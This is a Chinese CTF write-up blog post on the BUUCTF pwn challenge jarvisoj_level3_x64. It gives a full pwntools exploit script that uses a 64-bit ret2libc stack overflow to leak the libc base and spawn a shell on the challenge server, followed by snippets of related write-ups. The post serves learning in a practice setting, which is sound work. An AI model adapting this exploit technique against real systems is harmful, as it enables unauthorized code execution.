BUUCTF-jarvisoj_level3_x64

最新推荐文章于 2026-01-26 17:21:29 发布
原创 最新推荐文章于 2026-01-26 17:21:29 发布 · 906 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
标签
#pwn #python #安全 #linux
本文介绍了一个简单的64位程序利用ret2libc技术进行栈溢出攻击的方法。通过构造payload泄露libc基地址,并利用该地址实现/bin/sh的调用,最终获得shell。文中详细展示了从分析到EXP脚本的全过程。

checksec

 

IDA

很简单的程序,栈溢出

 

没有system (bin/sh) 

很明显了     64位的ret2libc3

EXP

老规矩的脚本

from pwn import *

#start
# r = process("../buu/jarvisoj_level3_x64")
r = remote("node4.buuoj.cn",29734)
elf = ELF("./33level3")
libc = ELF("./libc-2.23-64.so")

#params
write_plt = elf.plt['write']
write_got = elf.got['write']
main_addr = elf.symbols['main']
rdi_addr = 0x4006b3
rsir15_addr = 0x4006b1

#attack
payload = b'M'*(0x80+8) + p64(rdi_addr) + p64(1) + p64(rsir15_addr) + p64(write_got) + b'M'*8 + p64(write_plt) + p64(main_addr)
r.sendlineafter("Input:\n",payload)
write_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))

#libc
base_addr = write_addr - libc.symbols['write']
system_addr = base_addr + libc.symbols['system']
bin_sh_addr = base_addr + next(libc.search(b"/bin/sh"))

#attack2
payload = b'M'*(0x80+8) + p64(rdi_addr) + p64(bin_sh_addr) + p64(system_addr)
r.sendlineafter("Input:\n",payload)

r.interactive()

jarvisoj_level3_x64
m0sway的博客
11-26 717
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
BUUCTF jarvisoj_level3_x64
2401_88087539的博客
02-22 558
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 671
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTFjarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 1095
BUUCTFjarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
[BUUCTF-pwn]——jarvisoj_level3_x64
Y_peak的博客
10-25 564
简单的ret2libc通过vuln函数,我们可以看出程序中包含write和read函数,同时存在栈溢出。通过write泄露read的got表地址。进而获得libc,重新控制代码再次进行栈溢出即可获得shell。
buuctf中的jarvisoj_level3_x64
最新发布
2301_79485835的博客
01-26 333
这题有两种做法,一种是用LibcSearcher搜索匹配的libc库,一种是用已有的libc库做,由于是64位程序,猜到libc库是libc.so.6,两种做法都需要进行两次栈溢出,第一次计算出libc的基地址,第二次注入system函数拿到shellcode。没发现后门函数,按shift+F12后也没发现/bin/sh地址,考虑泄露libc来拿到shell。首先拿到vulnerable函数地址:0x4005E6,方便后面二次溢出。首先拿到rdi,ret和rsi+r15的地址,方便后面调用write函数。
BUUCTF--pwn--jarvisoj_level3_x64【ret2libc_64】
qq_73149934的博客
12-05 774
BUUCTF--pwn--jarvisoj_level3_x64
BUUCTF jarvisoj_level3
红叶的博客
10-27 596
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
jarvisoj_level3_x64解题
2301_81504456的博客
07-11 705
X64系统中程序参数前六个保存在寄存器中。
JarvisOJ level3_x64
PLpa的博客
07-09 1181
这题和level3大同小异,只不过这一题是x64的程序 做这题之前,建议先写level2。 拿到这题,我们首先查看保护: 程序只开了NX保护,好的。 根据做过level3的经验,我们先找出我们需要的地址(也可以用pwntools工具自动找): vul()函数: write()函数的plt地址: 之后我们找齐需要用的gadget: 但是我们并没有找到pop rdx ; ret,根据我们对w...
jarvis oj level3_x64
发蝴蝶和大脑斧的博客
12-07 924
level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。 先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。 0x00000000004006b3 : pop rdi ; ret 0x00000000004006b1 : pop rsi ; pop r15 ; ret 根据网上w...
[BUUCTF]jarvisoj_level3_x64详解(含思考过程、含知识点讲解)
2301_76794844的博客
08-30 1220
[BUUCTF]jarvisoj_level3_x64详解(含思考过程、含知识点讲解)
Jarvis OJlevel3_x64_通用ROP
Jc
07-13 440
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 2.代码审计 3.漏洞分析 1.程序无system和bin/sh,并且是个64位的,我们不能进行往栈里面写入数据 2.64位汇编 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样,...
buuctf jarvisoj_level3_x641
qq_73625550的博客
05-14 631
ret2libc,利用libcsearcher获取libc版本
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 346
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
BUUCTFjarvisoj_level3_x64,picoctf_2018_rop chain
m0_51251108的博客
12-30 273
BUUCTFjarvisoj_level3_x64 ROPgadget缺了rdx,对应的是输出的长度,要大于8 gdb调试可以看到rdx的值是0x200,足够大,不用管了 from pwn import* r=remote('node3.buuoj.cn',29628) libc=ELF('./libc-2.23.so') elf=ELF('./level3_x64') context.log_level = 'debug' context.arch = elf.arch pop_rdi=0x4006
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值